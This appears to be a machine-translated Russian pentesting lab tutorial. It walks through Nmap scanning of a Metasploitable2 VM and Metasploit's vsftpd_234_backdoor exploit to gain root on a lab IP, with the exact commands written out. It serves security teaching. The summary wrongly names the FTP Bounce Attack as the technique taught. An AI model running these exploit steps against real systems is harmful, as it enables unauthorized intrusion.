Эксплуатация уязвимостей FTP-сервиса с помощью Nmap и Metasploit

NmapNmapBeginner
Практиковаться сейчас

💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал

Введение

В этом лабораторном занятии вы научитесь эксплуатировать уязвимости в службе Протокола передачи файлов (File Transfer Protocol, FTP) для несанкционированного доступа к целевой машине. Сценарий разворачивается в контексте кибербезопасности, где вы будете играть роль этического хакера, которому поручено выявить и эксплуатировать уязвимости уязвимого FTP-сервера.

Целью этого лабораторного занятия является получение root-доступа к целевой машине Metasploitable2 путем использования уязвимости FTP-службы и применения Metasploit Framework, популярного инструмента для пентестинга. В результате этого практического опыта вы получите более глубокое понимание FTP Bounce Attack, методов сканирования портов и процесса эксплуатации с использованием Metasploit.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") subgraph Lab Skills nmap/port_scanning -.-> lab-416132{{"Эксплуатация уязвимостей FTP-сервиса с помощью Nmap и Metasploit"}} nmap/host_discovery -.-> lab-416132{{"Эксплуатация уязвимостей FTP-сервиса с помощью Nmap и Metasploit"}} nmap/target_specification -.-> lab-416132{{"Эксплуатация уязвимостей FTP-сервиса с помощью Nmap и Metasploit"}} nmap/service_detection -.-> lab-416132{{"Эксплуатация уязвимостей FTP-сервиса с помощью Nmap и Metasploit"}} end

Настройка лабораторной среды

На этом шаге вы настроите лабораторную среду, которая состоит из двух виртуальных машин: машины с Kali Linux в качестве машины-атакующего и машины Metasploitable2 в качестве целевой.

  1. Запустите виртуальную машину Metasploitable2, выполнив следующую команду в терминале:
sudo virsh start Metasploitable2

Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.

  1. Проверьте, что машина Metasploitable2 запущена, отправив ей ping:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить ping.

  1. Запустите контейнер с Kali Linux и войдите в его оболочку bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Протестируйте сетевое соединение между контейнером с Kali Linux и машиной Metasploitable2:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить ping.

Теперь как машина-атакующий, так и целевая машина запущены, и вы можете приступить к пентестингу.

Примечание: Если вы случайно выйдете из текущей оболочки bash, контейнер с Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash на хост-машине, чтобы запустить новый контейнер с Kali и войти в оболочку bash для продолжения эксперимента.

Выполнение сканирования портов

На этом шаге вы будете использовать инструмент сканирования Nmap для определения открытых портов и запущенных служб на целевой машине Metasploitable2.

  1. Запустите службу базы данных PostgreSQL, которая требуется для работы Metasploit:
service postgresql start
  1. Инициализируйте базу данных Metasploit:
msfdb init
  1. Запустите консоль Metasploit Framework:
cd ~
msfconsole
  1. Используйте Nmap для сканирования целевой машины и определения открытых портов:
nmap -sV -T4 192.168.122.102

Опция -sV включает определение версий для открытых портов, а -T4 устанавливает политику времени для более быстрого сканирования.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Эксплуатация уязвимости FTP-службы

На этом шаге вы будете использовать выявленную уязвимость FTP-службы для несанкционированного доступа к целевой машине Metasploitable2.

  1. Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
  1. Найдите модуль сканера FTP в Metasploit:
search scanner/ftp
  1. Используйте модуль ftp_version для сканирования FTP - службы:
use auxiliary/scanner/ftp/ftp_version
  1. Установите целевой хост для сканирования:
set RHOSTS 192.168.122.102
  1. Запустите сканирование версии FTP:
exploit
  1. На основе определенной версии FTP найдите соответствующий модуль эксплойта:
search vsFTPd
  1. Используйте модуль vsftpd_234_backdoor для эксплуатации уязвимости:
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Установите целевой хост для эксплойта:
set RHOST 192.168.122.102
  1. Выполните эксплойт:
exploit

Нажмите Ctrl + D, чтобы выйти из консоли Metasploit, а затем начните проверку

Проверка успешной эксплуатации

На этом шаге вы проверите, что эксплуатация прошла успешно и вы получили root-доступ к целевой машине Metasploitable2.

  1. Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
  1. Проверьте текущего пользователя:
whoami
  1. Проверьте имя хоста скомпрометированной машины:
hostname
  1. Проверьте IP - адрес скомпрометированной машины:
ifconfig

Нажмите Ctrl + D, чтобы выйти из консоли Metasploit, а затем начните проверку

Резюме

В этой лабораторной работе вы научились эксплуатировать уязвимость FTP-службы для несанкционированного доступа к целевой машине. Вы настроили лабораторную среду с уязвимой машиной Metasploitable2 и машиной-атакующим с Kali Linux. Вы выполнили сканирование портов с использованием Nmap для определения открытых портов и служб, а затем воспользовались Metasploit Framework для эксплуатации выявленной уязвимости FTP-службы. Наконец, вы проверили успешность эксплуатации, проверив текущего пользователя, имя хоста и IP-адрес скомпрометированной машины.

Благодаря этому практическому опыту вы приобрели практические знания и навыки в выявлении и эксплуатации уязвимостей, использовании популярных инструментов кибербезопасности, таких как Nmap и Metasploit, а также понимании техники FTP Bounce Attack. Эти навыки являются обязательными для этических хакеров и профессионалов в области кибербезопасности для оценки и укрепления безопасности систем и сетей.